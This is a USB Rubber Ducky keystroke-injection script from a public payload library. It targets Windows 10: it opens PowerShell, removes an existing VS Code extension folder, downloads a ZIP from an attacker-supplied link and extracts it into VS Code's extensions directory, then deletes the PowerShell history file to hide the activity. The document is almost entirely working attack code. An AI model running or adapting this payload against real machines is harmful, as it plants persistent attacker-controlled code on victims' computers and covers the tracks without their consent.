CoCalc -- payload.txt

GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt
²⁹⁷¹ views
1
REM_BLOCK
2
##########################################################
3
#                                                        #
4
# Title        : Install Any Arbitrary VSCode Extension  #
5
# Author       : Aleff                                   #
6
# Version      : 1.0                                     #
7
# Category     : Execution                               #
8
# Target       : Windows 10                              #
9
#                                                        #
10
##########################################################
11
END_REM
12

13
REM Replace "example" with the name of the extension folder
14
DEFINE #EXTENSION_NAME example
15

16
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
17
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
18

19
EXTENSION PASSIVE_WINDOWS_DETECT
20
    REM VERSION 1.1
21
    REM AUTHOR: Korben
22

23
    REM_BLOCK DOCUMENTATION
24
        Windows fully passive OS Detection and passive Detect Ready
25
        Includes its own passive detect ready.
26
        Does not require additional extensions.
27

28
        USAGE:
29
            Extension runs inline (here)
30
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
31
            boot delay
32
            $_OS will be set to WINDOWS or NOT_WINDOWS
33
            See end of payload for usage within payload
34
    END_REM
35

36
    REM CONFIGURATION:
37
    DEFINE #MAX_WAIT 150
38
    DEFINE #CHECK_INTERVAL 20
39
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
40
    DEFINE #NOT_WINDOWS 7
41

42
    $_OS = #NOT_WINDOWS
43

44
    VAR $MAX_TRIES = #MAX_WAIT
45
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
46
        DELAY #CHECK_INTERVAL
47
        $MAX_TRIES = ($MAX_TRIES - 1)
48
    END_WHILE
49
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
50
        $_OS = WINDOWS
51
    END_IF
52

53
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
54
        IF ($_OS == WINDOWS) THEN
55
            STRING HELLO WINDOWS!
56
        ELSE
57
            STRING HELLO WORLD!
58
        END_IF
59
    END_REM
60
END_EXTENSION
61

62
GUI r
63
DELAY 1000
64
STRINGLN PowerShell
65
DELAY 1000
66

67
STRINGLN_POWERSHELL
68
    $extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
69

70
    if (Test-Path -Path $extensionsPath -PathType Container) {
71
        Remove-Item -Recurse -Force -Path $extensionsPath
72
    }
73
END_STRINGLN
74

75
REM May it depends by the extension...
76
DELAY 2000
77

78
STRINGLN_POWERSHELL
79
    $url = "#ARCHIVE_LINK"
80
    $downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
81
    $extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
82
    Invoke-WebRequest -Uri $url -OutFile $downloadPath
83
    if (Test-Path -Path $downloadPath) {
84
        Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
85
        Remove-Item -Path $downloadPath -Force
86
        Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
87
    }
88
END_STRINGLN
89

90
Product

Resources

Company
